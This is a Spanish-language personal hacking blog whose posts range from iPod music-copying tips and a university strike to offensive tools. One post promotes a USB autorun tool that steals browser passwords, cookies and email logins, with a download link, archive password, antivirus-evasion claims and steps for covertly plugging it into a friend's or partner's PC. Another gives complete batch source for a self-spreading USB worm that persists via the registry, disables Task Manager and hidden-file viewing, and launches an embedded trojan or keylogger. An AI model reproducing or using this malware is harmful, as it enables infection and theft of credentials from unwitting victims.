Murd0c

Envio de sms gratis, Fakes de hotmail, Fakes de Msn, Fakes de Yahoo, Manuales, Tutoriales, Hacking, Defacing, Prehacking, Cracks, Programas Gratis, Pensamientos, Links y Mucho mas

Renace (((Restaura, repara, arregla))) a la ipod shuffle

En construccion

posted by Murdoc @ 1:11 p.m., ,

Liberar de itunes una ipod shuffle

Muchos han kerido pasar canciones del ipod shuffle a otra computadora, pero no te dejan tan facil y si lo ke haces es copiar las cancones de esta manera, psss son mas pasos los ke tienes ke seguir, es mejor liberarla de itunes, o almenos a mi me gusta mas asi.

1.-Descargas el rebuild_db.
2.-De preferencia deja vacia tu ipod (((Todas las canciones ke tienes sincronizadas borralas, los archivos no importa))) y tambien en el itunes en preferencias donde dice abrir itunes al instertar este ipod dejalo deseleccionado.
3.-Ahora copia todas las canciones ke quieras a tu ipod (((Incluso pueden estar en carpetas separadas por genero, gusto o como tu kieras))).
4.-Descomprime la carpeta de rebuild_db. Y corta o copia el ke se llama rebuild_db.exe
5.-Pegalo en el directorio principal del Ipod (((Ke no este dentro de una carpeta))).
6.-Ejecuta el archivo rebuild_db.exe (((Te saldra una ventanita de ms-dos, y despues te pedira ke oprimas una tecla para salir))).
7.-Listo ya tu ipod funcionara normalmente, y puedes copiar y pegar tus canciones a tu gusto, sin tanto lio.

Recomendaciones para el uso de rebuild_db

1.-Si envias mas musica a la iPod ejecuta el rebuild_db.exe nuevamente
2.-Si el itunes actualiza el ipod, ejecuta el rebuild_db.exe, por ke lo que hace el itunes es volver a poner sus opciones (((asi ke de preferencia cierra bien el itunes andes de insertar el ipod))).

Mmm creo ya no recuerdo mas.

Nota:Esto solo funciona con ipods shuffle

posted by Murdoc @ 12:52 p.m., ,

Copiar Canciones de un iPod a tu Pc

A veces necesitamos copiar musica de nuestra iPod a la compu de un amigo, o para hacer un respaldo, pero iTunes no deja hacerlo (((por ke es no es legal me supongo))), entonces he aki una breve explicacion de como hacerlo, a la mejor algunos ya lo sabran, pero lo dejo para usuarios novatos.

ES TU RESPONSABILIDAD LO KE HAGAS CON ESTE TUTORIAL


1.-Abre tu Ipod desde mi PC.

2.-Muestra los rachivos ocultos: Selecciona Herramientas/Opciones de carpeta.
3.-Ahora selecciona Ver.
4.-Selecciona mostrar todos los archivos ocultos y dale en aceptar.
5.-Ahora ya se muestra una carpeta llamada iPod_Control, dale doble click para ver. 6.-Te mostrara la carpeta iTunes y Music, entra a Music y veras las siguientes carpetas.


Tendras muchas carpetas o pocas dependiendo de la capacidad de tu iPod, en cada una de ellas se encuentra algunas de canciones ke tienes en el iPod.
7.-Introducete a la carpeta ke quieras y selecciona las canciones ke deseas copiar y dale click derecho enviar a (((o tambein las puedes copiar y pegar, arrastrar etc))).
Nota:La unica desventaja de esto es ke las canciones kedan con un nombre de acrchivo como ZOFZ, pero el iTunes o otro reproductor de musica, si reconoce el nombre de la cancion (((Siempre y cuando lo tenga en el titulo ja))).

Espero les sirva de algo saber esto salu2

posted by Murdoc @ 12:29 p.m., ,

Skull MSN Man. V 0.1.5

Creado por skullmaster123

-Opciones d el MSN Man.-


- Contact Flooder, para sacar a tus contactos del Messenger
- Giant Greeting, una opcion que nos permite mandarle un mensaje a TODOS nuestros contactos conectados
- Status Flooder, nos permite floodear con ventanitas popUp Por defecto son 8 ventanitas
- MSN Spam, opcion que nos permite elegir cuantos contactos queramos de la lista(Que esten conectados) y mandarles un mensaje cuantas veces queramos del 1 al Infinito! (No recomiendo poner 25000)
______________________________________________________________________________________

Version V 0.1.5

Aqui les presento una version mas, esta no sera la ¡nueva! version con muchas cosas incluidas, esta version es mas para arreglar pequeños Bugs del programa, y como todo con nuevas opciones!



Nuevas Opciones:

+ Arreglo de los Bugs los encontrados!
+ Un nuevo Flooder Nudger, nos permite enviar a 1 solo contacto cuantos nudgeos queramos
+ Ahora podemos crear cuantos menus PopUp queramos, ahora peudes elegir cuantas veces conectarte
+ Un pequeño manual del Contact Flooder


Futuras Opciones:

* Pues arreglar mejor los Bugs que se me presenten
* Para Robar avatares, emoticons de tus amigos
* Mejor interfaz de sieño
* Source Code
* y bueno si le quieren poner una nueva opcion por MP


Opciones Propuestas:

* Optener IP's

Bueno espero que disfruten la nueva version y me den sugerencia, avisos de bugs, etc!

LINK DE DESCARGA: MSN Manager V 0.1.5
LINK DESCARGA: MSN Manager V 0.1

Tambien puedes obterner el codigo fuente por medio de un mensaje privado , atravez de el foro de elhacker.net

posted by Murdoc @ 5:46 p.m., ,

Obten Datos de una Pc con tu USB y Viceversa

Me encontre esta utilidad y me parecio muy interesante decidi probarla y me funciono bien en windows xp, en vista no quiso funcionar cha, algunos vieron lo ke traia en mi usb y me preguntaron ke, ke era pero no di informacion, ya si entran aki lo sabran xDD

Aki el link de descarga del ke use yo Descargar USBROBADATOS es el unico ke he probado pero abajo dejo mas ke encontre (((Repiro ke segun funciona en Windows Vista y Windows Xp pero a mi no me funciono en vista))).

Esta herramienta captura ficheros de contraseñas y otros datos en del pc en que el insertemos nuestro pendrive USB.

Necesita 1 minuto para copiar todos los datos y funciona bajo Windows, aunque necesita permisos de Administrador.

Captura el historial del navegador, contraseñas del Messenger, etc.

Dudo que sea detectable por antivirus.

También existe lo mismo, pero al revés, que la víctima inserte su pendrive y "captura" todo el contenido de su pendrive al disco duro de manera sigilosa y transparente para el usuario.

USB Dumper (PC roba info del Pendrive)
http://www.kriptopolis.org/usb-dumper

USB Switchblade (Pendrive roba info del PC)
http://wiki.hak5.org/wiki//index.php?title=USB_Switchblade

Hay varias técnicas (playloads) dependiendo si el pendrive es U3 o no.

Incluso hay una técnica para el ipod

Más Info:
Ezequiel M. Sallis - Root-Secure
USB Hacks (pdf)
http://www.segu-info.com.ar/terceros/pdf/esallis_usb-hacks.zip

Fuente:
http://www.kriptopolis.org/usb-switchblade


Hacking with USB


Este programa roba toda clase de contraseñas e informacion confidencial de la PC en la que insertes tu USB, esto lo logra mediante un archivo autorun que ejecuta varias miniutilidades que tiene el programa entre otras lo que te puede ayudar a conseguir este programa es:

* Toda clase de contraseñas del navegador web hi5, myspace, e incluso de foros...
* Historial de navegacion completo.
* Clientes de correo tales como msn, yahoo, gmail y demás.
* Licencias de los programas y mucho más.

Al descomprimir es detectado como codigo peligroso, no alarmarse.


Link De Descargar: http://www.gigasize.com/get.php?d=dooy25nkb7c :://:: 530 KB
Password: http://phreackersworld.phpnet.us

H4T3 M3 :2:



Aqui una breve explicacion del Funcionamiento

Hacking Hotmail, MySpace, Hi5 y demás…

(By ChukNorris¬¬!)

Este programa realmente hace lo que promete roba toda clase de contraseñas e información confidencial de la PC en la que insertes tu USB, esto lo logra mediante un archivo autorun que ejecuta varias mini utilidades que tiene el programa entre otras lo que te puede ayudar a conseguir este programa es:
- Toda clase de contraseñas del navegador web hi-5, myspace, e incluso de foros.
- Historial de navegación completo (para darte cuenta del perfil de la víctima y o amiga)
- Cookies esto sabrán mis amigos más experimentados para lo que sirve.
- Los clientes de correo tales como msn, yahoo, gmail y demás.
- Toda la información de su hardware e IPs
- Los puertos abiertos recientemente.
- Licencias de los programas que tiene (incluidos Windows, Adobe y demás) Probado con:
- Avast
- Nod32
- AVG Antivirus
- Norton


¿Cómo usarlo?

1. Descargas el archivo lo descomprimes y cortas todos los archivos que están dentro de la carpeta
Hack. Luego abres tu USB y pegas los 5 quedándote así:



También puedes meter otros archivos en la USB o ponerlos como archivos ocultos para no levantar sospechas.
2. Una vez preparado con tu USB llegas a cualquier Cyber o casa de un “amigo” o “novia” o cualquier víctima que le traigas ganas y bajo cualquier pretexto le insertas la USB esperas 10 segundos aprox. o más y la sacas.
OJO: Nunca abras ninguna de las 5 carpetas, de lo contrario te mandará un mensaje de detección el antivirus así que mejor déjalo así.

3. Llegas tranquilamente a tu PC y revisas la carpeta de tu USB llamada 'Dump' observarás una carpeta con el nombre de la PC víctima y dentro de ella ordenaditos varios archivos .html revisas
los archivos y verás lo que tienes a tu disposición


Exploremos una carpeta omitiendo las contraseñas y parte del correo por razones obvias…


Lo que tenía la víctima de contraseñas…


NOTA: Al momento de descargar y descomprimir te lo marcará como archivo peligroso es natural pues tiene el autorun pero no te preocupes no es peligroso para ti...

Fuente: Elhacker.net

posted by Murdoc @ 5:08 p.m., ,

HOW-TO Crear Gusano de Memorias USB en BATCH

Herramientas a utilizar:

Quick_Batch_File_Compiler_3.1.5.0
que pueden descargar del siguiente enlace
http://rapidshare.com/files/97127487/Quick_Batch_File_Compiler_3.1.5.0.rar.html

Bueno en esta ocasión les tratare de explicar en breves palabras como crear su propio worm programado en batch.

Considero que es una buena respuesta para todos aquellos que buscan programas ya hechos que hagan estas funciones, cuando resulta mas fácil aprender a programarse el suyo.

Como se que muchos de aqui nunca en su vida han programado algo, a excepción de unos cuantos bats, pues queria poner de ejemplo un código para que puedan realizar sus propias pruebas y aprender por si solos.

Aclaro que si eres programador, este manual definitivamente no te servirá, pero si eres alguien curioso que quiere aprender y no tiene idea de programación, este manual te puede ser de gran ayuda.

Empezare dando una breve explicación de lo que hará nuestro worm y las funciones que realiza

Básicamente lo que hará nuestro script es lo siguiente

*copiarse a si mismo a una carpeta en windows
*crear el autorun que posteriormente será copiado en la memoria extraible USB
*añadirse al inicio de windows
*alterar registro de windows para cancelar opciones del sistema
*ejecuta tu troyano, keylogger o lo que quieras
*si encuentra una unidad donde copiarse, se copia junto con su autorun
*se añade atributos de oculto, sistema y solo lectura
*espera aprox. 60 segundos y repite el ciclo


de esta forma dotamos a nuestro programa de la habilidad de propagarse por si solo.
con un poco de ayuda de la victima claro esta

Bien ahora que sabes lo que el gusano hará te paso a explicar brevemente las funciones que utilice en el código

SET Sirve para definir una variable, por ejemplo
SET perro=firulais
de esa forma podemos cambiar el nombre del perro sin tener que hacerlo en cada una de las expreciones donde hagamos referencia a firulais.

ECHO Este comando basicamente sirve para "imprimir" en pantalla algun texto.

">" Este simbolo lo utilizamos para redirigir la salida de un comando, o tambien para comparar valores.

En este caso la salida del comando ECHO la dirigimos hacia un archivo de texto

IF NOT EXIST Este condicional se utiliza de la siguiente manera
SI NO EXISTE ... ENTONCES HAS ESTO
sirve para realizar acciones siempre y cuando se cumpla o no una condicion

Los demas son comandos basicos de la shell de windows CMD.EXE


Como funcionara el worm?
bien lo que haremos sera utilizar la herramientas antes mencionada para compilarlo y obtener un EXE que se ejecute de manera OCULTA, de esa forma no tendremos problemas con la tipica pantalla negra de los batch


el codigo del worm lo explique en cada seccion.

Código
@ECHO OFF
REM _______..___________. ___ .______
REM / || | / \ | _ \
REM | (----``---| |----` / ^ \ | |_) |
REM \ \ | | / /_\ \ | /
REM .----) | | | / _____ \ | |\ \----.
REM |_______/ |__| /__/ \__\ | _| `._____|
REM ____ __ ____ ______ .______ .___ ___.
REM \ \ / \ / / / __ \ | _ \ | \/ |
REM \ \/ \/ / | | | | | |_) | | \ / |
REM \ / | | | | | / | |\/| |
REM \ /\ / | `--' | | |\ \----.| | | |
REM \__/ \__/ \______/ | _| `._____||__| |__|
REM
REM ____ ____ _________ ____ ____ ____ ____ ____ ____
REM ||B ||||Y |||| ||||O ||||C ||||T ||||A ||||L ||||H ||
REM ||__||||__||||_______||||__||||__||||__||||__||||__||||__||
REM |/__\||/__\||/_______\||/__\||/__\||/__\||/__\||/__\||/__\|
REM
REM
REM DESCRIPCION: Codigo en batch que copia un archivo "X" a "X" unidad
REM [ OCTALH@GMAIL.COM ]
REM

REM +++++++++++ EDITA AQUI EL NOMBRE DEL WORM COMPILADO ++++++++++++++++

SET WORMORIGINAL=juego.exe
REM NOMBRE QUE TIENE ACTUALMENTE TU BATCH COMPILADO
SET WORM=1044404.EXE
REM NOMBRE QUE TENDRA EN LA MEMORIA USB

REM +++++++++++ EDITA AQUI EL NOMBRE DEL WORM COMPILADO ++++++++++++++++

SET AUTORUNORIGINAL=%WINDIR%\14785\WINUPDATE.DLL
REM DIRECCION COMPLETA DEL AUTORUN ESCONDIDO

SET AUTORUN=autorun.inf
REM NOMBRE QUE TENDRA EN LA MEMORIA USB

REM CREA UN DIRECTORIO EN LA CARPETA WINDOWS
MD "%WINDIR%\14785"

REM AQUI SE CREA EL ARCHIVO AUTORUN
ECHO [AUTORUN] >%AUTORUNORIGINAL%
ECHO open=%WORM% >>%AUTORUNORIGINAL%
ECHO shell\1=abrir >>%AUTORUNORIGINAL%
ECHO shell\1\Command=%WORM% >>%AUTORUNORIGINAL%
ECHO shell\2\=explorar >>%AUTORUNORIGINAL%
ECHO shell\2\Command=%WORM% >>%AUTORUNORIGINAL%
ECHO shellexecute=%WORM% >>%AUTORUNORIGINAL%

REM COPIA EL WORM A EL DIRECTORIO DE WINDOWS PARA OCULTARLO
COPY %WORMORIGINAL% "%WINDIR%\14785\SYSTEMSHELL.exe"
REM EJECUTA TU SERVER
START %MYFILES%\server.exe

REM SE AGREGA AL INICIO DEL SISTEMA
REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v wuaclt.exe /t REG_SZ /d "%WINDIR%\14785\SYSTEMSHELL.exe" /f
REM SE DESACTIVA EL ADMINISTRADOR DE TAREAS
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d "1" /f
REM SE DESACTIVA LA OPCION DE VER ARCHIVOS OCULTOS
REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\NOHIDDEN /v CheckedValue /t REG_DWORD /d "2" /f

:CHEKARWORM

REM VERIFICA LA EXISTENCIA DEL WORM

IF NOT EXIST "D:\%WORM%" GOTO COPIARWORM
IF NOT EXIST "E:\%WORM%" GOTO COPIARWORM
IF NOT EXIST "F:\%WORM%" GOTO COPIARWORM
IF NOT EXIST "G:\%WORM%" GOTO COPIARWORM
IF NOT EXIST "H:\%WORM%" GOTO COPIARWORM
IF NOT EXIST "I:\%WORM%" GOTO COPIARWORM
IF NOT EXIST "J:\%WORM%" GOTO COPIARWORM


:COPIARWORM

REM COPIA EL WORM Y LE ASIGNA ATRIBUTOS DE SOLO LECTURA
REM SISTEMA Y OCULTO.

COPY "%WINDIR%\14785\SYSTEMSHELL.exe" "E:\%WORM%"
ATTRIB +S +H +R "E:\%WORM%"
COPY "%WINDIR%\14785\SYSTEMSHELL.exe" "F:\%WORM%"
ATTRIB +S +H +R "F:\%WORM%"
COPY "%WINDIR%\14785\SYSTEMSHELL.exe" "G:\%WORM%"
ATTRIB +S +H +R "G:\%WORM%"
COPY "%WINDIR%\14785\SYSTEMSHELL.exe" "H:\%WORM%"
ATTRIB +S +H +R "H:\%WORM%"
COPY "%WINDIR%\14785\SYSTEMSHELL.exe" "I:\%WORM%"
ATTRIB +S +H +R "I:\%WORM%"
COPY "%WINDIR%\14785\SYSTEMSHELL.exe" "J:\%WORM%"
ATTRIB +S +H +R "J:\%WORM%"

REM COPIADO DEL AUTORUN Y ASIGANCION DE ATRIBUTOS

COPY "%AUTORUNORIGINAL%" "E:\%AUTORUN%"
ATTRIB +S +H +R "E:\%AUTORUN%"
COPY "%AUTORUNORIGINAL%" "F:\%AUTORUN%"
ATTRIB +S +H +R "F:\%AUTORUN%"
COPY "%AUTORUNORIGINAL%" "G:\%AUTORUN%"
ATTRIB +S +H +R "G:\%AUTORUN%"
COPY "%AUTORUNORIGINAL%" "H:\%AUTORUN%"
ATTRIB +S +H +R "H:\%AUTORUN%"
COPY "%AUTORUNORIGINAL%" "I:\%AUTORUN%"
ATTRIB +S +H +R "I:\%AUTORUN%"
COPY "%AUTORUNORIGINAL%" "J:\%AUTORUN%"
ATTRIB +S +H +R "J:\%AUTORUN%"

GOTO LOOP


:LOOP
REM UNA ESPECIE DE SLEEP XD DE PROX 60 SEGUNDOS
ping 127.0.0.1 -n 60
GOTO CHEKARWORM


bien ahora explicare como utilizar el codigo.

lo primero sera fijarce en esta parte del codigo

Código:
                 SET WORMORIGINAL=juego.exe
REM NOMBRE QUE TIENE ACTUALMENTE TU BATCH COMPILADO
SET WORM=1044404.EXE
REM NOMBRE QUE TENDRA EN LA MEMORIA USB

Es indispensable que la variable WORMORIGINAL=juego.exe tenga el mismo nombre que el worm unaves compilado con QUICK BATCH FILE COMPILER

Tambien verifica esta parte del codigo

Código:
REM EJECUTA TU SERVER
START %MYFILES%\server.exe

aqui donde dice server.exe tiene que tener el mismo nombre que el archivo a adjuntar en el QUICK BATCH FILE COMPILER.

Para compilar tu worm solo tienes que copiar el codigo en el QUICK BATCH FILE COMPILER

te debe quedar algo asi


Ahora haremos que se ejecute de forma oculta, para eso nos vamos a project, optiones y activamos la opcion Gost aplication



Ahora debes agregar tu aplicacion a propagar, puede ser un server de troyano, keylogger etc etc...
para eso vamos a la pestaña Embedded Files y damos click en el icono de la cruz verde y posteriormente añadimos nuestra aplicacion, tambien pueden agregar un icono personalizado en esta pestaña.



recuerda que este archivo se debe llamar como lo indicaste en
Código:
REM EJECUTA TU SERVER
START %MYFILES%\server.exe

ahora precionamos F9 para compilarlo y listo!!, ahora tienes tu propio worm programado en batch.


Bien con esto llegamos al final de esta pequeña guia, espero que haya sido de tu agrado

http://foro.elhacker.net/index.php/topic,203100.0.html

posted by Murdoc @ 12:53 a.m., ,

Hay clases en la UAEH??? Termina la huelga en UAEH

Hoy me acabo de levantar AAAAAaaa, y mi cuate me aviso ke ya termino la huelga de la UAEH, asi es!!! e aki los links

Noticieros televisa

Milenio

Sol de Hidalgo

Pues diske ya hubo acuerdo y hoy Martes 4 de Marzo se reanudan clases, chaaa mi examen de calculo era a la 9 am xDD, espero ke no lo hallan aplicaron.

Bueno ire hoy a ver si ya paso el desma y a ver ke onda.

Salu2 a todos los de la uni y ni modo se nos acabaron las vacaciones jajaja, a ver si con lo ke les aumentaron a los profes nos enseñan mejor.


posted by Murdoc @ 10:47 a.m., ,

UAEH en huelga

A lo largo de mi "educacion" (((suena muy mamon))), ninguna de mis escuelas habia estado en huelga, mi concepto de huelga es un grupo de personas ke suspenden labores para presionar y exigir sus derechos (((es mi propio concepto no se si este bien xDD))).

He visto en noticias ke en tal lado hay huelga y siempre lo veo lejano, como si nunca pudiera suceder en donde yo estoy, y ahora ke sucedio ke???, eso fue lo primero ke se me vino a la mente, al principio dije ke chido no voy a tener clases, pero despues de analizarlo un poco y con unos rumores ke me dijo mi cuate, me puse a pensar, un dia, dos o ya ponle por mucho una semana no se pierde demasiado, pero si se prolonga todo el semestre???


Bueno a lo ke voy es ke hay 2 versiones

1.-Se dice ke la huelga es por ke los profesores exigen un 15% de aumento, el rector dijo ke no contaba con tanto varo la uni y les dieron el 4.5 directo al salario , pero ahora kerian 10 dias mas de awinaldo y ke hasta ke se cumplan las exigencias regresaran a sus labores chaa.

bueno eso es lo ke lei en algunas partes, pero se me hace algo muy confuso y por eso tambien no me animaba a ponerlo aki, ya ke algunos manejan 15%, otros 25%, otros 20% etc.

2.-Hay rumores ke todo esto esta planeado y es nada mas para chingar al rector y no durara mucho, como unos cuantos dias o a lo mucho unas 2 semanas.

Lo ke si me enoja es ke los afectados somos nosotros, ya ke nos dejan sin clases asi como asi y despues van a estarnos exigiendo, creo yo ke pudieron intentar otras formas para lograr su objetivo y no irse al extremo.
Siento ke este tema es muy confuso (((insisto))) por ke he encontrado varias opiniones, varias versiones, parece como si estuvieran jugando con mi mente xDD, en un principio vi a los profes como los villanos pero ahora con todo lo ke he leido ya no se ni ke pensar.

Keria poner uan imagen de la huelga, pero no pa ke, si esas las pueden ver en el periodico, noticias, asi ke decidi poner esta, mi mochila y utiles olvidados. Por ke???

Por ke eso es lo ke keria expresar, no un monton de gente ahi marchando, corriendo alumnos de la Uni, banderas rojas con negro, si no ke al hacer esto es como si se olvidaran de nosotros y no tuvieramos opinon.

Algunos diran ke es la unica forma en ke les haran caso, pero en serio sera la unica forma???


No se si escribiendo esto mis ideas se acomodaron un poco o se alteraron mas ja

posted by Murdoc @ 8:30 p.m., ,

Estadistikas

 

Eres el visitante numero

Segun tu Ip me Visitas de

IP Address Lookup

Acerca de este blog

Este blog es una recopilacion de informacion relacionada con la computadora, tambien escribo lo ke pasa en mi vida, pensamientos o cualkier cosa ke se me ocurra, la plantilla la buske en internet y la modifike un poco, pero dejandole los creditos.

Contacto

Para cualquier contacto enviame un correo o agregame en tu Msn, mi correo es Murd0c.in.utero@gmail.com o dejame un comentario en le Tag-Board.

 

 

 

Descargas

Utilidades Online

Foros

Archives

Previous Posts

Powered By

Powered by Blogger